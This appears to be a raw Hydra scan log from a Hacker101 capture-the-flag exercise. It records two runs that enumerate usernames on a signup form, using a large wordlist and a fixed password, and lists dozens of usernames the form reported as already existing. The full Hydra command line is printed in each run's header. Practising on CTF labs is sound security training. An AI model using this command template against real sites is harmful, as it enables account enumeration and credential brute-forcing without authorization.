# Hydra v9.3 run at 2022-10-24 18:41:54 on 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com http-post-form (hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p asdf -s 443 -o scans/hydra_signupmanager_username 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com http-post-form /signup-manager/:action=signup&username=^USER^&password=^PASS^&age=1&firstname=tryadminY&lastname=tryadminY:Username already exists)
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: admin   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 2000   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: michael   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: NULL   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: info   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: john   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: david   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: robert   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: chris   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: dave   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mike   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: richard   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 123456   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: thomas   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: steve   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mark   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: charlie   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: daniel   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: george   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: andrew   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: paul   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: dragon   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: james   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: qwerty   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: martin   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: master   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: patrick   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: pussy   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mail   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: charles   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: bill   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 1234   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: peter   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: johnny   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: shadow   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: hunter   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: carlos   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: black   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: jason   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: tarrant   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: alex   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: brian   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: steven   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: scott   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: edward   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 12345   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: joseph   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: matthew   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: hammer   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: justin   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: natasha   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: jack   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: dallas   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: anthony   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: gary   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: harley   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: dennis   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: cameron   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mustang   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: fuck   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: monkey   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: webmaster   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: ranger   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: kevin   password: asdf
# Hydra v9.3 run at 2022-10-24 18:52:16 on 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com http-post-form (hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p asdf -s 443 -o scans/hydra_signupmanager_username 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com http-post-form /signup-manager/:action=signup&username=^USER^&password=^PASS^&age=1&firstname=tryadminY&lastname=tryadminY:Username already exists)
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: michael   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: admin   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 2000   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: john   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: chris   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: info   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: NULL   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: david   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: robert   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mike   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: dave   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: richard   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: 123456   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: thomas   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: steve   password: asdf
[443][http-post-form] host: 0754f24e9208edeb76d8dc82f77a040d.ctf.hacker101.com   login: mark   password: asdf
